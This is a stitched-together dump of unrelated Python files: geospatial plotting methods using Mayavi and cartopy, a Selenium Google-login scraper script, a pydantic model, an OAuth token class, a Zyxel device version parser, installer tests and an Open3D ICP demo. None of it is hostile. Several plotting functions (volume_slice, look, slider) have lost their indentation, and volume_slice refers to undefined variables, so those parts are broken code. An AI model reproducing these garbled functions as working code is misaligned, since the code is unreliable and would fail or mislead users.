            vmin = np.nanpercentile(data, 0.1)
        if vmax is None:
            vmax = np.nanpercentile(data, 99.9)
        # Offscreen rendering unless an interactive window was requested.
        if show:
            mlab.options.offscreen = False
        else:
            mlab.options.offscreen = True
        # cmap=None selects the custom LUT path; 'viridis' is only a
        # placeholder whose table is overwritten below.
        # NOTE(review): if cmap is None and lut is also None, the LUT table
        # is set to None -- presumably callers always pass one of the two;
        # confirm before relying on it.
        if cmap is None:
            set_lut = True
            cmap = 'viridis'
        else:
            set_lut = False
        fig = mlab.figure(size=figsize, bgcolor=bgcolor)
        # Height-warped surface of the 2D array.
        surf = mlab.surf(data, warp_scale=warp_scale,
                         colormap=cmap, vmin=vmin, vmax=vmax, figure=fig)
        mlab.view(azimuth=azimuth, elevation=elevation,
                  distance=distance, roll=roll)
        if set_lut:
            surf.module_manager.scalar_lut_manager.lut.table = lut
        mlab.draw()
        if save_name is not None:
            # Screenshot returns floats in [0, 1]; scale to 8-bit RGBA.
            save_array = mlab.screenshot(
                figure=fig, mode='rgba', antialiased=True) * 255
            imageio.imwrite(save_name, save_array.astype(np.uint8))
        if show:
            mlab.show()
        mlab.close(all=True)
        # Return obj
        return None
def volume_slice(self, data,
save_name=None,
cmap='viridis',
vmin=None,
vmax=None,
show=False,
bgcolor=(1., 1., 1.)):
'''Open Mayavi scene
New function
'''
# Import mlab
from mayavi import mlab
# try:
# engine = mayavi.engine
# except NameError:
# from mayavi.api import Engine
# engine = Engine()
# engine.start()
if vmin is None:
vmin = np.nanpercentile(data, 0.1)
if vmax is None:
vmax = np.nanpercentile(data, 99.9)
# if len(engine.scenes) == 0:
# engine.new_scene()
mlab.figure(size=(1000, 1000), bgcolor=bgcolor)
mlab.clf()
mlab.volume_slice(data.values, plane_orientation='x_axes')
mlab.view(azimuth=azimuth, elevation=elevation,
distance=distance, roll=roll)
# module_manager = engine.scenes[0].children[0].children[0]
# module_manager.scalar_lut_manager.lut_mode = cmap
# scene = engine.scenes[0]
# scene.scene.x_minus_view()
if save_name is not None:
mlab.savefig(save_name, size=(1000, 1000))
if show_slice:
mlab.show()
return None
    def map_grid(self,
                 im_datas,
                 ax = None,
                 vectors=[],
                 v_col=[],
                 v_alpha=1,
                 v_lw=1,
                 v_x_offset=0,
                 v_y_offset=0,
                 vmin=None,
                 vmax=None,
                 d_alpha=1,
                 dpi=300,
                 cmap='gray',
                 cbar=False,
                 save_cbar=None,
                 cbar_x_label='',
                 cbar_y_label='',
                 n_bins = 51,
                 cbar_dist = False,
                 cbar_dist_color = 'k',
                 cbar_dist_alpha = 0.6,
                 dist_height_ratio = 5,
                 cbar_dist_norm_peak = False,
                 corientation=None,
                 cfigsize=None,
                 cbar_label='',
                 cbar_labelsize = 16,
                 coastline_res='50m',
                 extent=None,
                 raster_extent = None,
                 fig = None,
                 line_c='gray',
                 g_c='gray',
                 g_w=0.5,
                 transparent_background=True,
                 g_a=0.5,
                 line_w=0.9,
                 circ_map=False,
                 figsize=None,
                 grid_steps=90,
                 mask_land=False,
                 mask_ocean=False,
                 map_crs=None,
                 norm = None,
                 ocean_color='white',
                 return_fig_ax = False,
                 land_color='green',
                 no_land_fill=np.nan,
                 title=None,
                 save_name=None,
                 show=True,
                 map_res='i',
                 draw_coast=True,
                 draw_grid=True,
                 draw_stock=False,
                 par=None,
                 mer=None,
                 draw_labels=False,
                 **kwargs):
        '''Make map view for print or display.

        Keyword arguments:
        im_datas -- one raster (array or label) or a list of rasters to draw
        ax, fig -- If provided, use these axes/figure instead of new ones
        vectors, v_col -- vector file name(s) drawn on top, with colour(s)
        v_alpha, v_lw -- alpha and line width of the vector overlay
        vmin, vmax - - Set range of colormap. If not set 0.1 percentile is used
        cmap - - Select colormap
        cbar - - Boolean colorbar or not
        save_cbar -- file name to save a stand-alone colorbar figure to
        cbar_dist -- include a histogram of the (last) raster with the
            stand-alone colorbar
        extent - - Select a different extent than the object (left, right, down, up)
        line_c - - Color of lines
        g_c, g_w, g_a -- colour, width and alpha of the graticule
        line_w - - Width of lines
        circ_map - - If selected, map is cropped to a circle around the center
            as a hub. Sometimes visually appealing
        figsize - - Size of figure in cm. Default is 12 cm high
        mask_land / mask_ocean -- overlay the cartopy land/ocean features
        ocean_color - - Colour of oceans
        no_land_fill - - Value for no land
        title - - String for title
        save_name - - Name of file to save to. E.g. png, pdf, or jpg
        show - - Off if only saving, good for scripting
        coastline_res = '110m', '50m' or '10m' for higher resolution
        draw_coast - - If True, coastline is drawn
        draw_grid - - Draw parallels and meridians
        par - - List of Parallels
        mer - - List of Meridians
        return_fig_ax -- return (fig, ax) instead of showing

        This function will in a near future be amended to use cartopy or GMT.
        '''
        # NOTE(review): the mutable defaults vectors=[] and v_col=[] are not
        # mutated here, but None defaults would be safer.
        def create_circular_mask(h, w, center=None, radius=None):
            # Boolean mask of the pixels within `radius` of the image centre
            # (the `center` argument is always recomputed and ignored).
            center = [int(w / 2), int(h / 2)]
            Y, X = np.ogrid[:h, :w]
            dist_from_center = np.sqrt((X - center[0])**2 + (Y - center[1])**2)
            mask = dist_from_center <= radius
            return mask
        # Fill in defaults derived from the grid object.
        if figsize is None:
            figsize = (10, 10 * self.nx / self.ny)
        if par is None:
            par = np.arange(-90, 91, 10)
        if mer is None:
            mer = np.arange(-180, 181, 45)
        if map_crs is None:
            map_crs = self._epsg_to_cartopy(self.crs)
        if extent is None:
            extent = self.extent
        if raster_extent is None:
            raster_extent = self.extent
        if fig is None:
            #plt.clf()
            fig = plt.figure(figsize=figsize)
        if ax is None:
            ax = plt.axes(projection=map_crs)
        ax.set_extent(extent, map_crs)
        # If only one raster, make list with one element
        if not isinstance(im_datas, list):
            im_datas = [im_datas]
        if not isinstance(d_alpha, list):
            d_alpha = [d_alpha]
        # Loop to print all rasters
        for i, im_data in enumerate(im_datas):
            im_data = self._user_to_array(im_data)
            # A None entry is drawn as a fully transparent NaN layer.
            if im_data is None:
                im_data = np.zeros(self.nn)
                im_data[:] = np.nan
                vmin = 0
                vmax = 0
            # vmin, vmax = self._set_v_range(vmin, vmax, im_data)
            # Percentile range of the first raster is reused for the rest.
            if vmin is None:
                vmin = np.nanpercentile(im_data, 0.1)
            if vmax is None:
                vmax = np.nanpercentile(im_data, 99.9)
            if circ_map:
                h, w = im_data.shape[:2]
                mask = create_circular_mask(h, w, radius=h / 2)
                im_data[~mask] = np.nan
            im = ax.imshow(im_data,
                           alpha=d_alpha[i],
                           extent=raster_extent,
                           norm=norm,
                           vmin=vmin,
                           vmax=vmax,
                           transform=map_crs,
                           cmap=cmap,
                           zorder=5)
        # Colorbar for the last raster drawn.
        if cbar:
            cbar = fig.colorbar(im, orientation='vertical',
                                fraction=0.046, pad=0.01)
            cbar.set_label(cbar_label)
        if mask_land:
            ax.add_feature(cart.feature.LAND, zorder=100, edgecolor=land_color)
        if mask_ocean:
            ax.add_feature(cart.feature.OCEAN, zorder=100,
                           edgecolor=ocean_color)
        if draw_stock:
            ax.stock_img()
        if draw_coast:
            ax.coastlines(resolution=coastline_res, color=line_c, zorder=15)
        if draw_grid:
            gl = ax.gridlines(ylocs=par, xlocs=mer, alpha=g_a, linewidth=g_w,
                              color=g_c, draw_labels=draw_labels, zorder=25)
            gl.n_steps = grid_steps
        # Vector overlay: accept single names as well as lists.
        if isinstance(vectors, str):
            vectors = [vectors]
        if isinstance(v_col, str):
            v_col = [v_col]
        for j, vector in enumerate(vectors):
            with fiona.open(str(vector), 'r') as src:
                for i, geom in enumerate(src):
                    x = [i[0] for i in geom['geometry']['coordinates']]
                    y = [i[1] for i in geom['geometry']['coordinates']]
                    # x, y = proj.transform(proj.Proj(
                    #    init='epsg:%s'%env['shape_proj']),
                    #    proj.Proj(init='epsg:%s,
                    #    x, y)
                    #x = [v_x_offset + _ for _ in x]
                    #y = [v_y_offset + _ for _ in y]
                    ax.plot(x, y, c=v_col[j],
                            alpha=v_alpha, lw=v_lw, zorder=20)
        if title is not None:
            fig.suptitle(title)
        fig.canvas.draw()  # https://github.com/SciTools/cartopy/issues/1207
        fig.tight_layout(pad=0)
        if transparent_background:
            ax.outline_patch.set_visible(False)
            ax.background_patch.set_visible(False)
        if save_name is not None:
            plt.savefig(save_name, transparent=True,
                        bbox_inches='tight', pad_inches=0, dpi=dpi)
            print('Saved to:', save_name)
        # Optional stand-alone colorbar figure (with histogram if requested).
        if save_cbar is not None:
            if cfigsize is None:
                cfigsize = figsize
            if corientation is None:
                corientation = 'horizontal'
            if cbar_dist:
                # NOTE(review): the histogram uses im_data, i.e. the last
                # raster of the loop above -- confirm that is intended when
                # several rasters are drawn.
                cig, (dax, cax) = plt.subplots(2,1,figsize=cfigsize,
                                               sharex=True,
                                               gridspec_kw={'height_ratios': [1, dist_height_ratio]})
                dax.axis('off')
                dax.hist(im_data.flatten(),
                         bins=n_bins,
                         density=True,
                         color=cbar_dist_color,
                         alpha=cbar_dist_alpha)
                dax.set(xlim = (vmin, vmax))
                plt.subplots_adjust(hspace = 0.02, wspace=0)
            else:
                cig, cax = plt.subplots(figsize=cfigsize)
            cbar = plt.colorbar(im, ax=cax,
                                pad=0, fraction=1,
                                orientation=corientation,
                                aspect=10)
            cax.axis('off')
            cax.set_xlim(vmin, vmax)
            cbar.ax.tick_params(labelsize=cbar_labelsize)
            cbar.ax.set_xlabel(
                cbar_x_label,
                rotation=0,
                size=12)
            cbar.ax.set_ylabel(
                cbar_y_label,
                rotation=0,
                size=12)
            cig.savefig(save_cbar, transparent=True,
                        bbox_inches='tight', pad_inches=0, dpi=dpi)
        if return_fig_ax:
            return fig, ax
        else:
            if show:
                plt.show()
        return None
def look(self, rasters, save_name='look.png',
interp_method=None,
color_map='viridis',
show=True,
save=False,
max_n_plots=16,
x_unit='(km)',
y_unit='(km)',
ref_range=None,
**kwargs):
'''
Quick look of 2D slices.
Keyword arguments:
interp_method -- imshow interpolation methods
Rather undeveloped function.
'''
if len(rasters) > max_n_plots:
print('To much to see!')
return 0
else:
n_sq = int(np.ceil(np.sqrt(len(rasters))))
fig, ax = plt.subplots(n_sq, n_sq, figsize=(10, 10))
for k, raster in enumerate(rasters):
x_coords = raster.coords[sorted(raster.dims)[0]]
y_coords = raster.coords[sorted(raster.dims)[1]]
if ref_range is None:
plot_range = (np.nanmin(raster.values),
np.nanmax(raster.values))
else:
plot_range = ref_range
ax[k // n_sq, k % n_sq].imshow(raster.values,
interpolation=interp_method,
cmap=color_map,
extent=self.x1y1x2y2,
vmin=plot_range[
0], vmax=plot_range[1],
**kwargs)
ax[k // n_sq, k % n_sq].title.set_text('%s' % (raster.name,))
ax[k // n_sq, k % n_sq].set_aspect('auto')
ax[k // n_sq, k % n_sq].set_ylabel(y_coords.name + x_unit)
ax[k // n_sq, k % n_sq].set_xlabel(x_coords.name + y_unit)
fig.tight_layout(pad=0)
if save:
fig.savefig(save_name, transparent=True,
bbox_inches='tight', pad_inches=0)
if show:
plt.show()
return ax
def slider(self, data,
cmap='viridis',
figsize=(10, 10),
slider_dim=None,
slide_start=0,
slide_stop=None,
vmin=None,
vmax=None,
idx0=0,
sub_sample=1,
slider_label='Depth'):
'''Interactive display 3D grid with slider.
Using matplotlin widget.
For Jupyter, run: %matplotlib notebook
'''
data = self._user_to_array(data)
if slider_dim is None:
slider_dim = data.ndim - 1
assert data.ndim is 3, 'Slider only works for 3D data. '
fig, ax = plt.subplots(figsize=figsize)
plt.subplots_adjust(left=0.25, bottom=0.25)
d_data = np.take(
data, idx0, axis=slider_dim)[::sub_sample, ::sub_sample]
l = plt.imshow(d_data, cmap=cmap, origin='lower')
ax.margins(x=0)
if slide_stop is None:
slide_stop = data.shape[slider_dim]
axidx = plt.axes([0.25, 0.15, 0.65, 0.03], facecolor='orange')
slidx = Slider(
axidx,
slider_label,
slide_start,
slide_stop,
valinit=idx0,
valfmt='%d')
def update(val):
idx = slidx.val
d_data = np.take(
data, idx, axis=slider_dim)[::sub_sample, ::sub_sample]
l.set_data(d_data)
if vmin is None:
d_vmin = np.nanpercentile(d_data, 0.1)
else:
d_vmin = vmin
if vmax is None:
d_vmax = np.nanpercentile(d_data, 99.9)
else:
d_vmax = vmax
l.set_clim([d_vmin, d_vmax])
fig.canvas.draw_idle()
slidx.on_changed(update)
plt.show()
return None
    def layer_cake(self,
                   data,
                   figsize=None,
                   save_name=None,
                   show_map=True,
                   make_wireframe=True,
                   d_alpha=0.6,
                   d_levels=100,
                   g_alpha=0.3,
                   g_lw=0.4,
                   scale_x=1,
                   scale_y=1,
                   scale_z=1,
                   vmin=None,
                   vmax=None,
                   cmap='viridis',
                   cbar=True,
                   layers=None,
                   dims=['X', 'Y', 'Z'],
                   global_vm=True,
                   reduce_dims=[5, 5, 5],
                   g_xy_sub_sample=5,
                   ax_grid=False,
                   x_factor=1,
                   y_factor=1,
                   z_factor=1,
                   azim=250,
                   elev=10,
                   dist=10,
                   x_lim=None,
                   y_lim=None,
                   z_lim=None,
                   outer_frame=False,
                   xlabel='$X$',
                   ylabel='$Y$',
                   zlabel='$Z$'):
        '''Display 3D data as stacked contour layers, using only matplotlib.

        Keyword arguments:
        data : data to plot, 2D or 3D (array or dataset label)
        figsize : figure output size in cm
        save_name : filename as string to save file; don't save if None
        show_map : call plt.show() at the end
        make_wireframe : draw a wireframe at every layer depth; the cell size
            of the wireframe is g_xy_sub_sample times the grid resolution
        d_alpha, d_levels : alpha and number of contour levels per layer
        g_alpha, g_lw : alpha and line width of the wireframe
        vmin, vmax : colour range (0.1/99.9 percentiles when None)
        layers : Z values to draw; defaults to every Z coordinate of the grid
        global_vm : one colour range for all layers (required for cbar)
        azim, elev, dist : camera placement
        x_lim, y_lim, z_lim : axis limits; derived from the dataset when None
        x_factor, y_factor, z_factor : divisors applied to the tick labels
        '''
        data = self._user_to_array(data)
        if figsize is None:
            figsize = (12, 12)
        print('3D')
        fig = plt.figure(figsize=figsize)
        # NOTE(review): gca(projection='3d') is deprecated in recent
        # matplotlib; fig.add_subplot(projection='3d') is the replacement.
        ax = fig.gca(projection='3d')
        xve, yve = np.meshgrid(
            self.ds.coords['X_edge'], self.ds.coords['Y_edge'])
        xv = self.ds.coords['XV'].values
        yv = self.ds.coords['YV'].values
        # Axis limits default to the dataset extent; Z is inverted (max
        # first) so depth increases downwards.
        if x_lim is None:
            x_lim = (
                self.ds['X'].min(),
                self.ds['X'].max())
        if y_lim is None:
            y_lim = (
                self.ds['Y'].min(),
                self.ds['Y'].max())
        if z_lim is None:
            z_lim = (
                self.ds['Z'].max(),
                self.ds['Z'].min())
        if layers is None:
            layers = self.ds.coords['Z'].values
        if global_vm:
            if vmin is None:
                vmin = np.nanpercentile(data, 0.1)
            if vmax is None:
                vmax = np.nanpercentile(data, 99.9)
        assert data.ndim in [
            2, 3], 'Can not display data in %s dimensions.' % data.ndim
        # Draw one filled-contour slab (and optional wireframe) per layer
        # that falls inside the Z limits.
        for i, z in enumerate(layers):
            if np.min(z_lim) <= z <= np.max(z_lim):
                # 2D input is repeated on every layer; 3D input is sliced.
                if data.ndim == 2:
                    layer_data = np.copy(data)
                else:
                    layer_data = np.copy(data[:, :, i])
                if make_wireframe:
                    xv_g = xv[::g_xy_sub_sample, ::g_xy_sub_sample]
                    yv_g = yv[::g_xy_sub_sample, ::g_xy_sub_sample]
                    z_g = z * \
                        np.ones(
                            self.nn)[
                            ::g_xy_sub_sample,
                            ::g_xy_sub_sample]
                    ax.plot_wireframe(
                        xv_g,
                        yv_g,
                        z_g,
                        color='k',
                        alpha=g_alpha,
                        lw=g_lw)
                # Per-layer colour range when no global range is requested.
                if not global_vm:
                    vmin = np.nanpercentile(layer_data, 0.1)
                    vmax = np.nanpercentile(layer_data, 99.9)
                levels = np.linspace(vmin, vmax, d_levels)
                cube = ax.contourf(xv, yv,
                                   layer_data,
                                   levels,
                                   vmin=vmin,
                                   vmax=vmax,
                                   offset=z,
                                   alpha=d_alpha,
                                   cmap=cmap)
        if cbar:
            v = np.linspace(vmin, vmax, 10, endpoint=True)
            # A shared colorbar is only meaningful with a global range.
            assert global_vm, 'No global color map.'
            cbar = fig.colorbar(cube,
                                ticks=v,
                                pad=0.0,
                                shrink=0.3,
                                aspect=10)
        ax.set_xlabel(xlabel, fontsize=12)
        ax.set_ylabel(ylabel, fontsize=12)
        ax.set_zlabel(zlabel, fontsize=12)
        # Private matplotlib API: pushes the y label away from the axis.
        ax.yaxis._axinfo['label']['space_factor'] = 3.0
        plt.rcParams['axes3d.grid'] = ax_grid
        ax.set_xlim(x_lim)
        ax.set_ylim(y_lim)
        ax.set_zlim(z_lim)
        ax.azim = azim
        ax.elev = elev
        ax.dist = dist
        # Tick labels divided by the *_factor values (e.g. m -> km).
        ticks_x = ticker.FuncFormatter(
            lambda x, pos: '{0:g}'.format(x // x_factor))
        ax.xaxis.set_major_formatter(ticks_x)
        ticks_y = ticker.FuncFormatter(
            lambda y, pos: '{0:g}'.format(y // y_factor))
        ax.yaxis.set_major_formatter(ticks_y)
        ticks_z = ticker.FuncFormatter(
            lambda z, pos: '{0:g}'.format(z // z_factor))
        ax.zaxis.set_major_formatter(ticks_z)
        fig.tight_layout(pad=0)
        if save_name is not None:
            fig.savefig(save_name, transparent=True,
                        bbox_inches='tight', pad_inches=0)
        if show_map:
            plt.show()
        return None
def slice_3D():
return None
| 1.523438 | 2 |
src/server/scraper/scripts/login_google.py | wotsyula/flask-scrapper | 0 | 12764996 | #!/usr/bin/env python3
"""
Script that logs into `google.com`
"""
from logging import debug
from typing import Generator
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.keys import Keys
from ..script import Script as BaseClass
URL = 'https://www.google.com'
BAD_REQUEST = 400
UNAUTHORIZED = 401
SUCCESS = 200
class Script (BaseClass):
    """
    Script that is imported by `Scraper` object.
    See `Scraper.scrape()` function.
    """

    def goto_login_page(self):
        """
        Navigates to the login page.

        Returns:
            bool: False when a user is already logged in (nothing to do),
            True after navigating to the credentials form.
        """
        # A visible logout link means a session already exists.
        if self.exists('//*[contains(@href, "google.com/Logout")]'):
            debug('User already logged in')
            return False

        debug('going to login page')

        # click login button
        self.click('//a[contains(@href, "google.com/ServiceLogin")]')

        # check for input field
        if not self.exists('//input[@type="email"]'):
            # click on use another account button
            self.click('(//*[@tabindex="0"])[last()-2]')

        return True

    def execute(self, **kwargs) -> Generator[int, None, None]:
        """
        Attempts to log into website.

        Args:
            **max_page (int): last page to scrape. Default to 99
            **page (int): Starting page to start execution. Default to 1
            **retries (int): number of times to retry execution. Default to 2
            **user_name (str, optional): email address of google user. Defaults to SERVER_EMAIL.
            **user_pass (str, optional): password of google user. Defaults to SERVER_SECRET.
            **kwargs (dict[str, any]): Used to pass arguments to script

        Raises:
            TimeoutException: if required elements are not found on page
                after all retries are exhausted

        Yields:
            Generator[int, None, None]: HTTP-like status codes
                (BAD_REQUEST, UNAUTHORIZED or SUCCESS)
        """
        options = {**self.options, **kwargs}
        self.max_page = options.pop('max_page', 99)
        # page = options.pop('page', 1)
        retries = options.pop('retries', 2)
        user_name = options.pop('user_name', '')
        user_pass = options.pop('user_pass', '')

        # exit early if no user name / pass
        if len(user_name) < 2 or len(user_pass) < 2:
            yield BAD_REQUEST
            return

        try:
            self.driver.get(URL)

            if self.goto_login_page():
                debug('Entering email address')
                self.send_keys('//input[@type="email"]', user_name + Keys.ENTER, True)
                self.sleep(5)

                debug('Entering password')
                self.send_keys('//input[@type="password"]', user_pass + Keys.ENTER, True)
                self.sleep(10)

            yield SUCCESS

        except NoSuchElementException:
            # failure
            yield UNAUTHORIZED

        except TimeoutException as err:
            # no more attempts?
            if retries < 1:
                raise err

            # Try again, forwarding the retry's results to our caller.
            # (Previously the recursive call's generator was discarded
            # without being iterated, so the retry never actually ran;
            # also avoid passing a duplicate 'retries' keyword.)
            retry_kwargs = {**kwargs, 'retries': retries - 1}
            yield from self.execute(**retry_kwargs)
| 3.0625 | 3 |
components/server/src/data_model/meta/scale.py | kargaranamir/quality-time | 33 | 12764997 | <gh_stars>10-100
"""Data model scales."""
from pydantic import BaseModel # pylint: disable=no-name-in-module
from .base import DescribedModel
class Scale(DescribedModel):  # pylint: disable=too-few-public-methods
    """Base model for a single scale; its fields are inherited from DescribedModel."""
class Scales(BaseModel):  # pylint: disable=too-few-public-methods
    """Mapping of string keys to Scale models, as a pydantic custom root type."""
    __root__: dict[str, Scale]
| 1.851563 | 2 |
python-django/oauth2demo/oauth/core/token.py | SequencingDOTcom/oAuth2-demo | 1 | 12764998 | <reponame>SequencingDOTcom/oAuth2-demo
class Token(object):
    """Container for an OAuth2 token pair.

    Attributes:
        access_token: the access token value.
        refresh_token: the token needed to refresh the access token.
        lifetime: lifetime of the access token.
    """

    def __init__(self, access_token, refresh_token, lifetime):
        """Store the token triple on the instance."""
        self.access_token = access_token
        self.refresh_token = refresh_token
        self.lifetime = lifetime
| 2.40625 | 2 |
app/services/authentication/authenticator/request_analyzer.py | maxzhenzhera/my_vocab_backend | 0 | 12764999 | from dataclasses import dataclass
from typing import cast
from fastapi import Request
__all__ = ['RequestAnalyzer']
@dataclass
class RequestAnalyzer:
    """Convenience accessors for client metadata on an incoming request."""

    request: Request

    @property
    def client_ip_address(self) -> str:
        """IP address (host) of the connecting client."""
        host = self.request.client.host
        return cast(str, host)

    @property
    def client_user_agent(self) -> str:
        """Value of the request's ``User-Agent`` header."""
        return self.request.headers['user-agent']
| 2.8125 | 3 |
sa/profiles/Zyxel/MSAN/get_version.py | ewwwcha/noc | 1 | 12765000 | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Zyxel.MSAN.get_version
# ---------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
"""
"""
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetversion import IGetVersion
class Script(BaseScript):
    # Parses firmware/bootrom versions and hardware details from
    # Zyxel MSAN CLI output, trying several firmware output formats.
    name = "Zyxel.MSAN.get_version"
    interface = IGetVersion
    cache = True

    # Format 1 ('sys version'): product model / uptime / f/w / bootbase lines.
    rx_ver1 = re.compile(
        r"^\s*product model\s*:\s+(?P<platform>\S+)\s*\n"
        r"^\s*system up time\s*:\s+(?P<uptime>\S+)\s*\n"
        r"^\s*f/w version\s*:\s+(?P<version>\S+) \| \S+\s*\n"
        r"^\s*bootbase version\s*:\s+(?P<bootprom>\S+) \| \S+\s*\n",
        re.MULTILINE,
    )
    # Format 2 ('sys info show'): Model / ZyNOS / Bootbase, with optional
    # hardware version and a serial number.
    rx_ver2 = re.compile(
        r"^\s*Model: (?:\S+ \/ )?(?P<platform>\S+)\s*\n"
        r"^\s*ZyNOS version: (?P<version>\S+) \| \S+\s*\n"
        r".+?\n"
        r"^\s*Bootbase version: (?P<bootprom>\S+) \| \S+\s*\n"
        r".+?\n"
        r"(^\s*Hardware version: (?P<hardware>\S+)\s*\n)?"
        r"^\s*Serial number: (?P<serial>\S+)\s*\n",
        re.MULTILINE | re.DOTALL,
    )
    # Format 3: ZyNOS first, platform (MSC...) embedded in the bootbase line.
    rx_ver3 = re.compile(
        r"^\s*ZyNOS version\s*: (?P<version>\S+) \| \S+\s*\n"
        r".+?\n"
        r".+?\n"
        r"^\s*bootbase version\s*: (?P<bootprom>\S+)"
        r"\((?P<platform>MSC\S+)\) \| \S+\s*\n",
        re.MULTILINE,
    )
    # Format 4: Bootcode / Hardware / Serial / F/W block; the platform is
    # then taken from 'chips info' via rx_chips.
    rx_ver4 = re.compile(
        r"^\s*Bootcode Version: (?P<bootprom>.+)\s*\n"
        r"^\s*Hardware Version: (?P<hardware>.+)\s*\n"
        r"^\s*Serial Number: (?P<serial>.+)\s*\n"
        r"^\s*F/W Version: (?P<version>\S+)\s*\n",
        re.MULTILINE,
    )
    rx_chips = re.compile(r"^\s*(?P<platform>\S+?)(/\S+)?\s+")

    def execute(self):
        # Try 'sys version' first; on CLI syntax errors fall back to
        # 'sys info show' and match it against formats 2 and 3.
        slots = self.profile.get_slots_n(self)
        try:
            c = self.cli("sys version")
            match = self.rx_ver1.search(c)
        except self.CLISyntaxError:
            c = self.cli("sys info show", cached=True)
            match = self.rx_ver2.search(c)
            if not match:
                match = self.rx_ver3.search(c)
        if match:
            platform = self.profile.get_platform(self, slots, match.group("platform"))
        else:
            # Last resort: format 4, with the platform read from chips info.
            match = self.rx_ver4.search(self.cli("sys info show", cached=True))
            if match:
                match1 = self.rx_chips.search(self.cli("chips info"))
                r = {
                    "vendor": "ZyXEL",
                    "platform": match1.group("platform"),
                    "version": match.group("version"),
                }
                # Format 4 devices report "not defined" for absent fields;
                # only store attributes that are actually present.
                if match.group("bootprom") != "not defined":
                    if "attributes" not in r:
                        r["attributes"] = {}
                    r["attributes"]["Boot PROM"] = match.group("bootprom")
                if match.group("hardware") != "not defined":
                    if "attributes" not in r:
                        r["attributes"] = {}
                    r["attributes"]["HW version"] = match.group("hardware")
                if match.group("serial") != "not defined":
                    if "attributes" not in r:
                        r["attributes"] = {}
                    r["attributes"]["Serial Number"] = match.group("serial")
                return r
            else:
                raise self.NotSupportedError()
        # Formats 1-3: always have version and bootprom; hardware and
        # serial are optional groups.
        r = {
            "vendor": "ZyXEL",
            "platform": platform,
            "version": match.group("version"),
            "attributes": {"Boot PROM": match.group("bootprom")},
        }
        if ("hardware" in match.groupdict()) and (match.group("hardware")):
            r["attributes"]["HW version"] = match.group("hardware")
        if ("serial" in match.groupdict()) and (match.group("serial")):
            r["attributes"]["Serial Number"] = match.group("serial")
        return r
| 1.796875 | 2 |
_unittests/ut_install/test_LONG_install_module.py | sdpython/pymyinstall | 8 | 12765001 | <gh_stars>1-10
"""
@brief test log(time=1s)
"""
import unittest
from pyquickhelper.loghelper import fLOG
from pymyinstall.installhelper.module_install import ModuleInstall
from pymyinstall.installhelper.module_install_version import get_module_version
class TestLONGInstallModule(unittest.TestCase):
    """Long-running checks of pymyinstall's pypi/installed version lookups.

    Uses unittest assertion methods instead of bare ``assert`` statements:
    they survive ``python -O`` and produce informative failure messages.
    NOTE(review): version numbers are still compared as strings, which is
    only an approximation of semantic ordering ("1.10.0" < "1.3.1"); kept
    unchanged to avoid a new dependency.
    """

    def test_pypi_version(self):
        fLOG(
            __file__,
            self._testMethodName,
            OutputPrint=__name__ == "__main__")

        mod = ModuleInstall("sphinx", "pip")
        vers = mod.get_pypi_version()
        self.assertIsNotNone(vers)
        self.assertGreaterEqual(vers, "1.3.1")

        mod = ModuleInstall("scikit-learn", "wheel", mname="sklearn")
        fLOG(mod)
        vers = mod.get_pypi_version()
        self.assertIsNotNone(vers)
        self.assertGreaterEqual(vers, "0.16.1")
        update = mod.has_update()
        fLOG("scikit-learn", update)

        mod = ModuleInstall("pandas", "wheel")
        vers = mod.get_pypi_version()
        self.assertIsNotNone(vers, mod.name)
        self.assertGreaterEqual(vers, "0.16.1", mod.name)

        mod = ModuleInstall("openpyxl", "pip", version="2.3.5")
        fLOG(mod)
        vers = mod.get_pypi_version()
        self.assertIsNotNone(vers, mod.name)
        self.assertGreaterEqual(vers, "2.3.5", mod.name)
        update = mod.has_update()
        if update:
            vers = mod.get_pypi_numeric_version()
            fLOG(vers)
        fLOG(update)

    def test_installed_version(self):
        fLOG(
            __file__,
            self._testMethodName,
            OutputPrint=__name__ == "__main__")

        mod = ModuleInstall("jinja2", "pip")
        res = mod.is_installed_version()
        if not res:
            # Dump the installed modules starting with "j" to ease
            # debugging before failing.
            fLOG(mod)
            fLOG(mod.get_installed_version())
            for k, v in get_module_version(None).items():
                if k[0] in ("j", "J"):
                    fLOG("+++", k, v)
            self.fail("jinja2 is not installed in the expected version")

        mod = ModuleInstall("pandas", "wheel")
        res = mod.is_installed_version()
        self.assertTrue(res)
        fLOG("****", mod.get_installed_version(), mod.get_pypi_version())
        if mod.get_installed_version() != mod.get_pypi_version():
            self.assertTrue(mod.has_update())
if __name__ == "__main__":
unittest.main()
| 2.15625 | 2 |
Open3d/code/Pipelines/icp_registration.py | yueliu1999/3d-vision | 7 | 12765002 | import open3d as o3d
import copy
import numpy as np
# Helper visualization function
def draw_registration_result(source, target, transformation):
    """Visualize *source* transformed onto *target*.

    Deep copies are used so the input point clouds are left untouched;
    the source copy is painted yellow and the target copy blue.
    """
    src = copy.deepcopy(source)
    tgt = copy.deepcopy(target)
    src.paint_uniform_color([1, 0.706, 0])
    tgt.paint_uniform_color([0, 0.651, 0.929])
    src.transform(transformation)
    o3d.visualization.draw_geometries([src, tgt])
# input: two point-cloud fragments from the Open3D ICP test data set
source = o3d.io.read_point_cloud("../test_data/icp/cloud_bin_0.pcd")
target = o3d.io.read_point_cloud("../test_data/icp/cloud_bin_1.pcd")
# Rough initial guess for the source->target transform (4x4 homogeneous).
trans_init = np.asarray([[0.862, 0.011, -0.507, 0.5],
                         [-0.139, 0.967, -0.215, 0.7],
                         [0.487, 0.255, 0.835, -1.4], [0.0, 0.0, 0.0, 1.0]])
draw_registration_result(source, target, trans_init)

# init: fitness/RMSE of the initial alignment before running ICP
print("Initial alignment")
threshold = 0.02  # max correspondence distance (metres)
evaluation = o3d.pipelines.registration.evaluate_registration(
    source, target, threshold, trans_init)
print(evaluation)

# point-to-point ICP (default convergence criteria)
print("Apply point-to-point ICP")
reg_p2p = o3d.pipelines.registration.registration_icp(
    source, target, threshold, trans_init,
    o3d.pipelines.registration.TransformationEstimationPointToPoint())
print(reg_p2p)
print("Transformation is:")
print(reg_p2p.transformation)
draw_registration_result(source, target, reg_p2p.transformation)

# point-to-point ICP again with a larger iteration budget
reg_p2p = o3d.pipelines.registration.registration_icp(
    source, target, threshold, trans_init,
    o3d.pipelines.registration.TransformationEstimationPointToPoint(),
    o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration=2000))
